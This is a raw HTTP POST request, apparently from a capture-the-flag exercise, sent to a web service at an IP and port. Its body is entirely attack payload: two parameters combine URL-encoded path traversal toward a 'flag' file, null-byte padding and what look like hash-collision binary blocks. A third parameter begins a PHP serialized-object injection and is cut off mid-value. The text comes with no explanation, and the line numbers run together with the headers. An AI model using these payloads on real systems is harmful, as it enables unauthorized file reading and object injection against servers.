1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST / HTTP/1.1 Host : 114.67.175.224:16474User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Upgrade-Insecure-Requests : 1Referer : http://114.67.175.224:16474/Accept-Encoding : gzip, deflateCookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; Hm_lvt_080836300300be57b7f34f4b3e97d911=1731934744Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language : zh-CN,zh;q=0.9,en;q=0.8Content-Type : application/x-www-form-urlencodedOrigin : http://114.67.175.224:16474Pragma : no-cacheCache-Control : no-cacheContent-Length : 390a= .%2 F..%2 F..%2 F..%2 F..%2 F..%2 F..%2 F..%2 F..%2 Fflag%00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %03 HX%E5r %04 %93 %D5 %8 E%B8c %A2I %02 %B3 %BA %11 %9 F%BE %3 D%10 %25 %B7 %296 fB%E5 %A5 %8 D%AD %A2 %9 A%D5 %FD %EBB %ED %E7 %26 %8 B%60 %CDt %1 A%98 %F9i %CC %BC %B4 %E7 %D3 %D4 %7 D%3 DL%C0sux %9 B%D89 %DB %5 C%90 %02 %0 C%0 C%DD %A7 %8 F%1 C%B0P7 %E4 %2 B%1 E%08 %9 C%9 Dp%FF %85 %0 E%1 E%D3 %1 A%069 %EC %C6 %01 %E6n %5 E%1 EV%F4 %8 F%F8 %12 %AAGHO %7 FPJl%F6 %5 B8 %06 %F7 %7 Cdm%BD %5 CC%02 %0 F%F2 %F3I &b= .%2 F..%2 F..%2 F..%2 F..%2 F..%2 F..%2 F..%2 F..%2 Fflag%00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %00 %03 HX%E5r %04 %93 %D5 %8 E%B8c %A2I %02 %B3 %BA %11 %9 F%BE %BD %10 %25 %B7 %296 fB%E5 %A5 %8 D%AD %A2 %9 A%D5 %FD %EBB %ED %E7 %26 %8 B%60 %CDt %1 A%18 %FAi %CC %BC %B4 %E7 %D3 %D4 %7 D%3 DL%C0s %F5x %9 B%D89 %DB %5 C%90 %02 %0 C%0 C%DD %A7 %8 F%1 C%B0P7 %E4 %2 B%1 E%08 %9 C%9 D%F0 %FF %85 %0 E%1 E%D3 %1 A%069 %EC %C6 %01 %E6n %5 E%1 EV%F4 %8 F%F8 %12 %AAGHO %7 F%D0Il %F6 %5 B8 %06 %F7 %7 Cdm%BD %5 CC%82 %0 F%F2 %F3I &c = O:5 :"Jesen" :3 :{s:8 :"username"